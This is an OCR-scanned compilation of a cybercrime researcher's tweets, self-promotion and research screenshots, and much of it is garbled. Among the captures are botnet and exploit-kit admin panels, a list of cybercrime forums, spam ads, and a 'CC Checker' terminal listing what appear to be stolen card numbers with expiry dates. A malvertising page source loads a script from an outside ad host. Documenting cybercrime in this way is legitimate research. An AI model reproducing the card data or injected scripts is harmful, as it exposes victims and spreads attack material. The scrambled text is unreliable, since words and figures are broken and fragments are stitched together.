Compilation Guide to Assist Law Enforcement and the U.S 
Intelligence Community Internationally 


Dancho Danchev 


hitos://ddanchev.blogspot.com Email: dancho.danchevehush.com 


12:31 
2022 in recap. Outstanding! https://t.co/JTcqOaYgET https://t.co/ZOgqBloxQw 


Tuble 9: Quality of selected intelligence sources (10 out of 45) 


Saf Saf Sal 
Blog covered thmely robust 
jocterms 1OCs 10Cs 
i 629 
% $59 S45 


Dancho Danchev 14% 


Naked Security - 459 
THN WG 419 51% 
Webroot 139 KA 
Threat Post 25 299 
TaoSecunity 689 
Sucurt S2% 
PaloAlto a7 % 
Malwarebytes 72% 
Hexacorn 76% 
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2023 


January 


2 - Monday 


02:41 


https://t.co/JIcqOaYgET #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #Threatintel #threatintell https://t.co/LneyFVJM3Z 
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Background 


| was born in Sofia, Bulgaria. My primary area of 
occupation since the early 90's ts computers. My 
primary work ts Disruptive individual's Chief 
Executive Officer (CEO) 


yPercrime Kesearcher 


Dancho 
Danchev Executive BIO 


Warindustries - Member 

BlackCode Ravers - Member 

Black Sun Research Facility - Contributor 
DiamondCs - List Moderator/Software Contributor 
LockDownCorp - Help Trojan Database Contributor 
Forbidden HelpNetSecurity - Contributor 
Astalavista Security Group - Managing Director 
Frame4 Security Systems - Contributor 
TechGenix - WindowSecurity - Contributor 

ZDNet Zero Day - Security Blogger 

Webroot Threat Blog - Security Blogger 


Conference and Events - Media and Press Coverage 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodlogy for processing threat intelligence leading to a successful set of 
hundreas of high-quality anaysis and research articles published at the industry's leading threat intelligence blog 
ZDNet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat 
Blog with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H*Magazine currently producing threat intelligence at the industry's leading threat intelligence 
blog - Dancho Danchev's - Mind Streams of Information Security Knowledge 


With his research featured at RSA Europe, CyberCamp, InfoSec, GCHOQ and Interpol the researcher continues to 
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's - 
MinStreams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research 
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe 


02:42 
Working on this. Stay tuned! https://t.co/fnswrm8KWP https://t.co/Z5jEi2XdFa 
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02:46 
Upcoming release. Stay tuned! https://t.co/JTcqOaYgET https://t.co/IqraOQKHob 
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Muftabe Raza is souget after by the FBI and is on the FBI's Most Warted Cybercremnals ist for Ps involvement in the Forwarderz 


based seling franchise where the best we Could Go is to offer practcal anc relevart analysis on his onfine whereabouts nclucin« 
Curmowagns. 


The first thing we wo 


URL address for his rogue enternese 


online wheresbouts and actual internet-commected intrasinuctzre 


Attachment(s); Component(s): 
Download Raza Indictreent pdt USAD - New Jersey 
Toplets): Press Release Number: 
Cyber Crime a0aag 
Among the first things you would have to do when doing OSINT in terms of fincing oul more about a FBI Most Warned Cybercriminal individual would be Io look inside the legal 


Gocumnents behind the case which on the majonty of occassions are offen pubicly accessible and look for the following 


© Wen sees 
e foment 


02:49 


*1 


Who wants or needs access to this? https://t.co/Tj9ouFrEaP 


ax) SeconcEye solutons rogue and take ID wan 


5 the actual network infrastructure behind his 


MalOn on his Company by actually using Google for the purpose of searching for its namne and actualy athenpting to find the exact Web site 


we would then use the internet Archive including several real-tene arxi festoncal WHOIS services to atiempt to find out more about his 
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11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
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aHack Forum-UINSell MaulTalk Szuwi 
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ArmadaBoard ForumSEO Nullnoss. org Toolbabase se 
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BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters. ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc. ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOF orum Zismo 
Darkmarket.la iFud 
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Who wants me to train him including their team or organisation on advanced #OSINT 
and #Threatintelligence techniques and methodologies? | have two modules 
currently available for #OSINT and #ThreatIntelligence with a lot of case studies. 
https://t.co/Hn|IxkVjFco 
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| can teach you hardcore #OSINT and #Threatintelligence in respect to cyber threat 
actor attribution and help you learn how to "connect the dots" on important cases 
and basically any cyber threat actor. Are you interested? https://t.co/9G1LJUWWN8 


1231 


ABOUTUS = 
Dancho Danchev Presents 


Dancho Danchev is an internationally recognized 
cybercrime researcher security blogger OSINT analyst and 
threat intelligence analyst that's currently running one of 


the security industry's most popular security publications 8 4 
his personal blog - https: //ddanchev.blogspot.com since eu. 
December, 2005 which has received approximately 5.6M 
page views since its original start In viduals 


: Py a BASIC AND ADVANCED 


bs po fat 
hth 5 OSINT AND THREAT INTELLIENCE 
at ae PROGRAM BUILDING AND TRAINING 
REACHUS Fj, 
+359876893890 : 


Email: dancho.danchev@hush.com 


https; //ddanchev.blogspot.com 


HTTPS://DDANCHEV.BLOGSPOT.COM 


03:14 


| have a single requirement before we begin which is that you must either know me 
personally or at least know me and my research and can describe it in a single 
sentence in terms of how it helped you do your work. Drop me a line at 
dancho.danchev@hush.com https://t.co/nfWrPOjdzf 
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https://t.co/gTZ1bJFokU [PDF] #security #cybercrime #malware #ThreatHunting 
#threatintell #threatintel https://t.co/B359ZUMEFS 
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https://t.co/JTcqOaYgET https://t.co/LbH1U4mYO9 
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4 - Wednesday 
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Who wants access to my OpenCTI instance? No audio. #Threatintel #threatintell 
#threatintelligence https://t.co/W4AAQsIxsu 
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Happy Aliens Day! https://t.co/ISF4wMqH1B 
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NbPBUA KJINEHT OT Bbsrapua uv ce HagABaM fa ce nonyyn cynep npoekT 3a 
o6yyeHve Ha nepcoHasy B cdepata Ha #OSINT #Threatintelligence Umenn: 

dancho.danchev@hush.com https://t.co/RLPwSwevgy 
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Folks. Beginning to record this. Subscribe at my YouTube Channel here - 
https://t.co/hc1jf6p4TX and here - https://t.co/Cjdnb1lyQlq this is going to be a long 
massive video introduction into my experience in the field circa the 90’s up to 
present day. https://t.co/MLVGhf2miQ 


*%2 
1239 


Dancho Danchev 

https://ddanchev. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 


26 - Thursday 


08:35 


https://t.co/R4uG2zZB2tM #Threatintelligence #threatintell #threatintel 
https://t.co/9NGLMW5uh0 
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13:22 


https://t.co/xeyEHllajn #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintell #threatintel 


13i22 


https://t.co/TEtRnFxby] #security #cybercrime #malware #ThreatHunting 
#Threatintelligence #threatintell #threatintel 
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1 - Wednesday 


01:53 


Who needs or wants cyber threat actor OSINT training for their team both novice and 
experienced? Drop me a line at dancho.danchev@hush.com https://t.co/xd 1NiMyReN 
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Who needs or wants cyber threat actor OSINT training for their team both novice and 
experienced? Drop me a line at dancho.danchev@hush.com https://t.co/DBR7kYHe7| 
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Folks. It’s official. | now have my own Cyber Threat Intelligence platform including a 
SIEM and user-friendly API where we also accept public cyber campaign attribution 
"inquiries" including "incidents" loCs where we'll do our best to attribute the 
campaign. 


<1 *l 
07:31 


Anyone using EventLog Analyzer, ThreatConnect, Azure Sentinel, Splunk, Cisco, 
Elemendar, Cortex XSOAR, TrendMicro, ArcSight, Microsoft Sentinel, EventTracker, 
Plixer Scrutinizer, and needs "pull" or "push" API access? Drop me a line at 
dancho.danchev@hush.com 
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Also Sumo Logic, Kaspersky CyberTrace, ServiceNow, CheckPoint ThreatCloud, 
Carbon Black EDR, Cisco Email Gateway, ThreatConnect, LogPoint, Tanium, 
Symantec, LogRhythm, and still wants "pull" or "push" API access? Drop me a line at 
dancho.danchev@hush.com 
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What can you do with our threat intelligence platform? Basically you can "pull" our 
daily and hourly updated threat actor specific threat intelligence including all the 
associated loCs (Indicators of Compromise). Drop me a line at 
dancho.danchev@hush.com 
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07:32 

You can also "push" your incidents including all the associated loCs and threat actor 
specific inquiries using our user-friendly API and we would pick your cyber threat actor 
attribution game analysis from there. Drop me a line at dancho.danchev@hush.com 
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We use a dedicated in-house developed OSINT methodology which we apply to every 
inquiry and incident including all the associated loCs that you send us and will assist 
you in finding out who’s behind your cyber attack campaign and will assist from there. 
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The best moment? We offer a fixed pricing model on a monthly basis for unlimited 
"oull" requests of our threat actor specific research which we publish on a daily basis 
and unlimited "push" incidents and threat actor specific inquiries on a monthly basis. 


*1 
07:33 


If it’s cyber threat actor and loCs attribution in the context of using OSINT and our 

in-house threat intelligence and cross-domain reference based methodology we're 

always there to assist and take your cyber threat actor attribution game to a new 
level. 


07:33 


Drop me a line at dancho.danchev@hush.com in order to inquire about the pricing 
and how to obtain access including your API key for the platform and let’s have a 
conversation and make it happen. 


07:34 


Check out our brochure here - https://t.co/9yEMZzlaFt and don’t forget that the best 
is yet to come and that we’re always there to take care of your cyber threat actor 
attribution inquiries and loCs. #OSINT #ThreatIintelligence #Threatintel 
#ThreatHunting https://t.co/zeGriYNt2O 


() Bsruptine 
Individuals 
Cyber Intelligence Platform 


Sign In 
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07:48 


RT @brightorigin: @dancho_danchev is the best threat intelligence researcher | know 
for years! Consistently delivering in-depth/insightful... 


07:54 


Wow. Thanks for the comment @brightorigin the pleasure is all mine and | promise to 
continue delivering high quality research and analysis. Always feel free to catch up 
with my research here - https://t.co/JTcqOaYOur including here - 
https://t.co/UZ6qVAI5Ld https://t.co/BuemDx9enQ 
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https://t.co/gr3X4ZoKOs #security #cybercrime #malware #Threatintel #threatintell 
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19:24 


"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBsXh1TFH6 [PDF] 
https://t.co/UNWQQb8F63 
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Who framed Dancho Danchev? 


Dancho Danchev, a Russian researcher known for his work against malware, has been missing since 
October and has never been heard of again. 


Giacomo Dotta , 
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"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBSXh1TFH6 [PDF] 
https://t.co/Vnfxixaqfe] 
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"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBSXh1TFH6 [PDF] 
https://t.co/2YDjfVOT29 


1246 


19:24 


® Identified Competitors 


Cyber Defense Agency (CDA) 
(US) 

Cyber Security Research and 
Development Center (US) 
Cyveillance (US) 

Dancho Danchev (EU) 
Department of Homeland 
Security US-CERT(US) 

Ernst & Young (EU) 

EWA Information and 
Infrastructure Technologies, Inc. 
(US) 

Fortify (US) 

Global Security Mag (EU) 


Competitors 


iDefense Labs (US) 


« JET Intelligent Risk Systems (US) 


Informatica (US) 

IT — Information Sharing and 
Analysis Center (US) 

iSIGHT Partners (US) 
Lookingglass (US) 


Multi-State Information Sharing 
Analysis Center (US) 


nCircle (US) 
SecureWorks (US) 
Trend Micro (US) 


United States Cyber 
Consequence Unit (US) 


"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
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Threat Actors - A 2021 Compilation" - https://t.co/zBsXh1TFH6 [PDF] 


https://t.co/BPUB4YIQee 
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"Personally Identifiable Information Regarding Some of the Most High-Profile Internet 
Cybercriminals Cybercrime Gangs and Various Internationally Recognized Cyber 
Threat Actors - A 2021 Compilation" - https://t.co/zBSKh1TFH6 [PDF] 
https://t.co/Bq6rENcx2T 
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https://t.co/UZ6qVAhxVF https://t.co/cM5U3YUItp 
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https://t.co/FG3ahO7dk7 #ThreatHunting #Threatintelligence #threatintell 
#threatintel 


14:11 
https://t.co/wbb5Hq8Oud #ThreatHunting #Threatintelligence #threatintell 
#threatintel 
1 
14:12 
https://t.co/sFlv3g9Jd) #ThreatHunting #Threatintelligence #threatintell #threatintel 
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https://t.co/iD8itOjjyo #ThreatHunting #Threatintelligence #threatintell #threatintel 
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https://t.co/4BcQ9Tx753 #ThreatHunting #Threatintelligence #threatintell 
#threatintel 
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https://t.co/CSQd9Jy2MU #ThreatHunting #Threatintelligence #threatintell 
#threatintel 
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https://t.co/BbYyMw4kuA #ThreatHunting #Threatintelligence #threatintell 
#threatintel 
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https://t.co/ZuwQJYxJjU #ThreatHunting #Threatintelligence #threatintell 
#threatintel 
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https://t.co/an36ff6Lag #ThreatHunting #Threatintelligence #threatintell 
#threatintel 


9 - Thursday 
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https://t.co/n6LihftIm3 #Threatintelligence #ThreatHunting #threatintell #threatintel 
https://t.co/TcUn9vOjVa 
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© Whois API Login Sign Up 


@) Law Enforcement Nautilus Feed Related links v 


Apply for Access to the Law 
Enforcement Nautilus Feed 


The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (lOCs) and Articles of Interest (AOls) linked to major malicious 
campaigns and APT groups. 


The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 
process by applying for access. 
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"Exposing TrickBot’s Bitzlato Cryptocurrency Exchange - An OSINT Analysis" - 
https://t.co/MP9m6JRHMt #security #cybercrime #malware #threatintell #threatintel 
https://t.co/LCVgfvgNGP 
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@NCSCgov Here’s my OSINT analysis - https://t.co/oF82LfFNqE here’s the actual 
1252 


document - https://t.co/Eyut9Twnoy 
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https://t.co/MP9mb6JRHMt #security #cybercrime #malware #Threatintelligence 
#threathunting #threatintell #threatintel https://t.co/lYa8luUWPz 
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12 - Sunday 


07:45 


O.K check this out inspired by a a recent @SOSIntel tweet. Takes you back to an old 
era of hardcore research and a lot of achievements and a lot of folks that | worked 
with. Got time? Grab my memoir from here - https://t.co/6V8O0FTdlSv [PDF] 
https://t.co/C6QLyC2IH9 
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TwitterCircle.com 


10:00 
I’m back! https://t.co/JTcqOaYgET https://t.co/qoFl3P9xwz 
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13 - Monday 


03:14 


"Setting them straight. Since the early days of humankind" - here’s the URL for my 

new and permanent Dark Web Onion - https://t.co/tuxftqFJxO Bookmark this today 

and stay tuned for the actual daily issued updates. Thank you everyone and stay 
tuned. https://t.co/bu8hqNpZWO 
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Welcome to Dancho Danchev's Dark Web Onion - "The Future of U.S Intelligence Community and Intelligence Gathering 2.0" - Proprietary and 
Community-Driven Single-Page Summary Proactively Offering General Security and Tailored Access Operations Recommendation Advice Including 
Proprietary access to OSINT Data on Key Individuals and Communities-Of-Notice Within the Security Industry Including Various Key Members of the Russian 
and Eastern European Cybercrime Underground Obtained Using OSINT (Open Source Intelligence) Techniques and Methodologies Including Technical 
Collection Using Public Sources Courtesy of the Project Operator 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known 419 Scammers and International Fraudsters - An OSINT Analysis - 
https://t.co/S7ZCx3XBBI [PDF] https://t.co/6A7HnIIqEH 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known 419 Scammers and International Fraudsters - An OSINT Analysis - 
Part Two - https://t.co/KPHPSwIPGN [PDF] https://t.co/t2dbjgmfkKD 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known 419 Scammers and International Fraudsters - An OSINT Analysis - 
Part Three - https://t.co/yFL8707eK7 [PDF] https://t.co/eMGlvdw4MO 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known to Have Been Used by Cyber Jihadists Internationally - An OSINT 


Analysis - https://t.co/lotz4hRRO} [PDF] https://t.co/O6nfeBSDp3 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known Cybercrime Gangs and Cybercriminals Internationally - An OSINT 
Analysis - https://t.co/vRF3GpAHRa [PDF] https://t.co/qgR3pUNw69z 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Cybercrime-Friendly Forum Communities and Associated E-Shops for 
Stolen and Compromised Credit Card Details - An OSINT Analysis - 
https://t.co/etrerdRs]X [PDF] https://t.co/DkKDHcz7POx 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known to Have Been Used by Ransomware Network Affiliate Based 
Participants Including Ransomware Gang Affiliates - An OSINT Analysis - 
https://t.co/t2J3dZYUGM [PDF] https://t.co/BVhTjrRUWE 
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My latest white paper for @whoisxmlapi - Exposing a Currently Active Domains 
Portfolio of Known to Have Been Used by Ransomware Network Affiliate Based 
Participants Including Ransomware Gang Affiliates - An OSINT Analysis - Part Two - 
https://t.co/VRpVyvFco6 https://t.co/EmiFrxBfM1 
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New white paper for @whoisxmlapi - Exposing a Currently Active Domains Portfolio of 
Known to Have Been Used by Ransomware Network Affiliate Based Participants 
Including Ransomware Gang Affiliates - An OSINT Analysis - Part Three - 
https://t.co/nSVINMK8Ux https://t.co/sBTrmCoDrA 
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https://t.co/OmME2p6LJ8C #security #cybercrime #malware #threatintell #threatintel 
#threatintelligence 

11:29 


Who is Dancho Danchev? - Part Two - https://t.co/8fZCXOM9R5 #security 
#cybercrime #malware #ThreatHunting #threatintell #threatintel 
https://t.co/3eAWrj9juf 
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https://t.co/nPxuz7Aunn https://t.co/MAYkIUNhUO 
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Welcome to Dancho Danchev's Dark Web Onion - “The Future of U.S Intelligence Community and Intelligence Gathering 2.0" - Proprietary and 
Community-Oriven Single-Page Summary Proactively Offering General Security and Tailored Access Operations Recommendation Advice Inchuding 
Proprietary access to OSINT Data on Key Individuals and Communities-Of-Notice Within the Security Industry Including Various Key Members of the Russian 
and Eastern European Cybercrime Underground Obtained Using OSINT (Open Source Intelligence) Techniques and Methodologies Including Technical 
Collection Using Public Sources Courtesy of the Project Operator 


Project Operator: Dancho Danchev | Email: dancho. danchev@hush com | Donate BitCoin: 1H74hr6hAkGv596DObhsueQgxqseVgNgzv5 
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DANCHO DANCHEV'S 
SECURITY RESEARCH 
FOR WEBROOT INC 
Dancho Daenchev's 


21 - Tuesday 


07:10 


Who wants or needs full offline copy of all of my publicly accessible research since 
December, 2005 which is approximately a 253GB torrent? Grab it from here - 
https://t.co/5cbzqOK3wb and check out my Dark Web Onion here - 
https://t.co/tuxftqFJxO https://t.co/cQseqXxOL62 


24 - Friday 


04:43 


https://t.co/HY4BPMWUN5 #security #cybercrime #malware #Threatintelligence 
#threatintell #threatintel 


10:08 
Happy Friday! https://t.co/LO42coTYnY 
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25 - Saturday 
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https://t.co/u260ZdaslS #security #cybercrime #malware #ThreatHunting 
#threatintell #threatintel #threatintelligence 
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https://t.co/JTcqOaYgET https://t.co/mQRtzmDFXV 
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08:29 
Using @MaltegoHQ even before it was cool. Case study: The Pay Per Install 


underground marketplace with outstanding results. Keep up the good work. 


https://t.co/robGVqiKMFO 
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Total (3 days): 1569/0 
Online:: 1466/0 
New bots (2 hours): 1569 
New bots (24 hours): 1569 


HK 12/12 1% 
IN 158 / 150 10% 
™ 12/12 1% 
3» 25 / 24 2% 
CN 31/26 2% 
NL 2/2 0% 
us 120/110 8% 
SE 1/1 0% 
8G 3/3 0% 
cL 12/11 1% 
NG 1/1 0% 
IT 7/7 0% 
= 51% 
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https://t.co/JTcqOaYgET https://t.co/Nq1lxICDbrA 


07:24:41] opening file neosploit.hits ... 
[2007-10-01 07:24:41] opening file neosploit.loads ... 
[2007-10-01 07:24:41] opening file neosploit.installs ... 
[2007-10-01 07:24:41] opening file neosploit.refs ... 
[2007-10-01 07:24:44] scheduled repairing of all databases ... 
[2007-10-01 07:24:45] repaired was successfully. 
(2007-10-01 07:24:45] congratulate! daemon has been started successfully! 
[2007-10-01 07:26:00) opening file neosploit.hits ... 
[2007-10-01 07:26:01] opening file neosploit.loads ... 
[2007-10-01 07:26:01] opening file neosploit.installs ... 
[2007-10-01 07:26:01] opening file neosploit.refs ... 
[2007-10-01 07:26:04] scheduled repairing of all databases ... 
[2007-10-01 07:26:04] repaired was successfully. 
[2007-10-01 07:26:04) congratulate! daemon has been started successfully! 
07:32:40] repairing of all databases with reset user Oxlad5beOd.. 
07:32:41] repaired was successfully. 
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08:44 
https://t.co/JTcqOaYgET https://t.co/WOlYr7j40Ou 


FEATURES & BENEFITS 
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Black Energy botnet status at 01:27:33 18.11.2008: 


08:50 
https://t.co/JTcqOaYgET https://t.co/FwWLHYpdcVK 


1284 


, . ; 
x Merry Ghristmas 


Stnple browser statistics Main Stathtks Exploit statistics 
Browser Visits Exploited Percent Unique Visits Exploited Percent fExplot Exploited Percent 


08:51 
https://t.co/JTcqOaYgET https://t.co/Ng6FThvqBF 


1285 


4 


09:06 
https://t.co/JTIcqOaYgET https://t.co/EoO0wCnD9t5 


1286 


(DS (CC Checher - Batch Terminal | - Mozilla Firefox 


ED x | 
gem (pee a Bye leew roe Cosme , z 
¢- oe |G beeecilecctte.combuatery she tpage= 33 =. e Cl a- 
@ rearus cpus [i] Mocreswe saroncwa 
finder ~ 8. wernt av © mew = & Boi F Macrpoteae DP Mapa +22 © 
Ly Avery inteigent reper ~ Carder to [CC Checker - Batch Terminal} (J . 
aruvenwey r 
3222-14-08 = 01:53:04 4544690001943490=1202 0212 a HOLD-CALL(O) 
m1 01:53:02 _ 4544690006126976=0803 


01:53:00 


4544690004275312" 0807 


319 02-14-08 


00 APPROVAL 


5774330) 
01:52:58 


4544694041092019" 0812 


1208 


318 02-14-68 


01:52:56 


APPROWAL 
355750(0) 
4SAAG90005 78295 1 + OSO6 


APPROVAL 
bed 518919(0) 
4277422210131607=0906 609 


WAL 
315 02-14-08 


014561(0) 


01:42:57 


4483561010187630+0003 


00 APPROVAL 
01:42:56 


014558(0) 


HOLD-CALL(O) 


44835670 10008262 =0902 


02-14-68 01:42:51 


448356509 1905463 « OF01 


00 APPROVAL 
312 02-14-08 


01:42:48 


014530(0) 

APPROVAL 

40358740001 13547" 0908 oo 014521(0) 
$9 1011 1213 14 15 1617 18...> 


09:07 


https://t.co/JIcqOaYgET https://t.co/OFbKnpbr7y 


1287 


Browser Details 


Pusey SB | atezoe | 5620% | 
ruses es 
TFiefox? ——@ | arms | came [ 
PFifoxs ——@ | tse | ze [SSCS 
Pusee 8 | s0s | sami SSCS 
PothertUninown @| aoa | ogem [ISS 
[sata aseo [ome |S 
Taows SSCS es | owe [SSCS 
[Fiefoxts —@ | za | om [SS 
[operas Se | ome | SSS 
PFivsfoxt ®t [osm | SOS 
Cchromeox @ [ses [orm [SOS 
Priockt SS | come | SSS 
Cuouiiat | 320 | com | OOS 
TnetcapeT zs | com | SOS 
[seattonkey? | 119 | om [SOS 
Tnetcapes |e | oom | SOS 
iphone |e | 


Pietcapes So | 00TH | 

[Firefox0x @ [a | orn | 

safes S86 | 000 | 
0.00% 


ruses S| 8 | C00H 
uobite Phones B25 oom SOS 
operas Ct | toe SOSCS~S 


09:07 
https://t.co/JTcqOaYgET https://t.co/NNS9OB1E1T 


1288 


09:08 


https://t.co/JTcqOaYgET https://t.co/PKpK1LAReHw 


1289 


09:10 


1290 


2] 


Mozilla Firefox 


Datei Bewheiten Aricht Ghrontk Lesemicien Extrw [fh 


& Pak 


bitty Mocalthost/polytedinin php 7 e Gell 
} ermcet04 en ferrpic.ong |] Amasonde: Speed-Lin 


| vBulletin Option - Fo <Zchehis \V, Seach Exgew 
Mim MySpace com - D-Flume - Frankfurt 


| 19 jpg UPEG-Grafik, } 
http Tecalhestipely‘edminphp 


™Y DOLLY we 
SPLOITS 


1.0 


Login 


https://t.co/JTcqOaYgET https://t.co/ZUMSFIDQ9A 


CIALIS 20mg x 60 Pills Only $159 ! best prices 
great quality ! 24/7 customer support = Quality 
Guaranteed ' We ship to ail U.S scares ! ! 
OStandart Ad 


Use Previous Images: LJ 


09:11 
https://t.co/JTcqOaYgET https://t.co/WwQpXRs5Yt 


1291 


fee ere Oe Bye Jenne creer §6Crpeeee 
@¢-3-@ GEL reno sicarder sata ha_cardinden choMoceahign shoe IF dA Ooch 7») 


@ Hrcrrenies creme L) Mocnearne saroncenne 


A 


i 
i 
: 


09:12 


https://t.co/JTcqOaYgET https://t.co/paVpxFxVwp 


Marks | All Marks =] Search | 


fina aopeees ma xocTHHre AM cctankn oToSpanre 8 eine (ecm Z20pmeH Ha GoHOC THEW e fervero SeaiepaTE He HyeHO) 
oC. hitp: {key domain,com 
o. http:iidomain.comkey! 
o. hitp://wew.domain.comkey/ 


Oo. MAPEMAUMBATD Cry uarreet OOPaI0e 


Make One Spar Mes: For Selected | Moke One Spam-t Type2 | No. 'b CHUCOK 43 bx COOGUIOHHE. 
Dawe ay % iu 
0 957160 https ledwardpeterson..247host. comringS815, bent Message For SpemtT} ed 
Oo 956826 betp:/fbheshiy hostevo.comirngy1 eri Message For Spemit| oat 
0 954463 http:/fbiheshly hostevo.comfringd93/ o7.tt Message For Sper od 
C 954449 http:/ibheshly hostevo.com/rings70} art Messege For SpamIT| edt 
cr 954438 http: {fbiheshly hostevo. comfrsehooe o7.i1 Message For SpemtT| ed 
r 954431 http: {foheshly hostevo.com/gresct rai Message For SperntT| edt 
Remove Selected 
Remove All 

09:17 


https://t.co/JTcqOaYgET https://t.co/92R4pjl4lf 


1292 


09:17 


Wellcome, root 


Adrren tools: 


09:18 


Browsers 


wee 
werent 
budep 


Total loads 


Cluck wpaeeenx uae SKeamnaa: © Cranicnmarapaxeme —~ Neacxenorax ~ Antemouck ~)Hacrpeteat 


Limbo admin panel 


reed 40.64 


7008-48-41 >» 
neee-4T-31 
7008.47.30 Pens 
rees-e7.29 
2008.47.28 Pam 
res 41-27 
8-47-26 


7008-07.25 > vee 


https://t.co/JTcqOaYgET https://t.co/stITOPunwWO 


Systems 


Cense red 


Totalaersert 


Upload 


Clean 


https://t.co/JTcqOaYgET https://t.co/JtTLNTdYph 


Country 


Clear 


Referers 


10% 
16.3% 
15.29% 
27% 
23% 
42.86% 
o*% 


952% 
307% 
O2% 
002% 
008% 
ons % 
o*% 


1293 


@ Adinewioed © Delete toad 


rpms 129 Me Aatawe 1 ()93901307-92.200 moneoer 136813 «= ORDO AReRTS | 
Mp ma 12523 We Actor q 
2 mptaee146 6742.2 2008-00-47 1398.14 2008-02-07 13.0814 


(1) 93:90:15 of-42.200 2008-02-47 13:98:15 2008-02-08 1203 33 
= Add Load Loads 


(1) 13:98 16 oF 42-2 2008-00-47 12.98.16 2070-02-07 13.90.16 
60-47 139816 2000-02-07 13.90.16 
247 126817 2000-02-07 139017 


? [13982007423 2008-42-47 139820 3000-02.07 13:99:20 
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T™ Update buskd 


FR Cheer stats «= Clear ot 


OnLine Stats 


@ soe updetet | | Ml updote 


EEE 


O7F.ALLD 07.02.09 07.02.09 STAD 07.02.09 OB.OLO9 OB 
A2c03c22 16:50:51 17462 x 3 731951 Ose: Ot: 
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® The good CAPTCHAs statistics are correct only if al 
have the rate CAPTCHA option enabled. otherwise it wi! 
Note: Click on an operator to see ! 
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7 w2 HTTP Privatesciemal.cn /oo.php?ide2010-106key=ebc7cRicatipel textfiam 

2») F rokver ft 2010-108er t 13, tare 

[a}9 200 ~=—sOHITTP artinawarekveproscarn3.com fi freg/yquery.is 55,746  appication/ 
Ls} 10 200 HTTP artimaearolveproscarv3.com fi feag/jqueryaint. js 681 appa ation 
{a} i2 200 HTTP artimawarciveproscarv3.com = fi fmog/istfle.- 13,220 sopkk ation! 
li) 14 200 HTTP artimalwarelveproscarv3.com fi /imeg/drugydrup..js 3,670 application! 
a HTTP jmacmind.com fappigecip. is textihemd; « 
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free cell phone directory 


cell phone service plans cellular phones will work in nearty any area you can be 
reached and notified of any immediate problem and you can also call for 
assistance if needed for ary medical or mechanical problem 


It also will close the door on one of the last vestiges of tranquility available to 
many of cell phone service plans 


Increasing numbers of parents are choosing to buy mobile phones for their 
children as a way of keeping in touch and they cell phone service plans looking 
for @ responsible service offering provided by a trusted brand, said Attila 
Gazdag, managing director, the Wam Disney intemet Group Europe. cell phone 
service plans phone was tumed off tater that day and | never heard from then 
again since. Having to learn a new vocabulary for every issue is getting to be a 
strain 


cell phone service plans some reason, that doesnt sound all that cool to me 
Whatever airtime plan you choose, be cell phone service plans to watch out for 
hidden charges 
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https://t.co/JTcqOaYgET https://t.co/KF2g2QSvCV 


<base href="http://uwy.eyevonder.com/" /><meta http-equiv="content-type” content="text/html; charset=utf-8" 
<f== Post Click Tracking Location: EyeWonder_HomePage EyeWoncder_ HomePage --> 

<script type="text/javascript"> 

<!-- 

var dd = nev Date(): 

var ord = Math. round (Math.abs(Math.sin(dd.getTime () )} *1000000000) * 10000000; 

var fd_pet_sre = new String("<scr"+"ipt sre\"http://adsfac.us/pct_mx.asp?L*235288ésource=jssord="tord+"\" t 
document.write (fd pet_src); 

-> 

</script> 

<noscript> 


</noscript> 

<!-- END --> 

<!DOCTYPE html PUBLIC "=//W3C//DTD XHTML 1.0 Transitional//EN" "http://www. w3.org/TR/xhtml1/DTD/xhtmll-trans 
<html sonlns*"http://vuv.v3.org/1999/xhtml"> 


<head> 

<meta http-equiv="Content-Type" content="text/html: charset=iso-8859-1" /> 

<!-- <meta http-equive"Content-Type” content="text/html; charset=utf-38" /> --> 

<TITLE>EyeWonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash Ads, Online Advertisin 


<mcta name*"keyvords” content*"eye wonder, eyevonder, ecye-wonder, ivonder, rich, media, richmedia, rich medi 
<meta name="description" content="EyeWonder is Interactive Digital Advertisinglis fastest-growing innovator, 
<META HAME="PUBLISHER" CONTENT="EyeWonder Inc."> 

<META MAME="COPYRIGHT” CONTENT="Copyright 2008 by EyeVonder Inc."> 

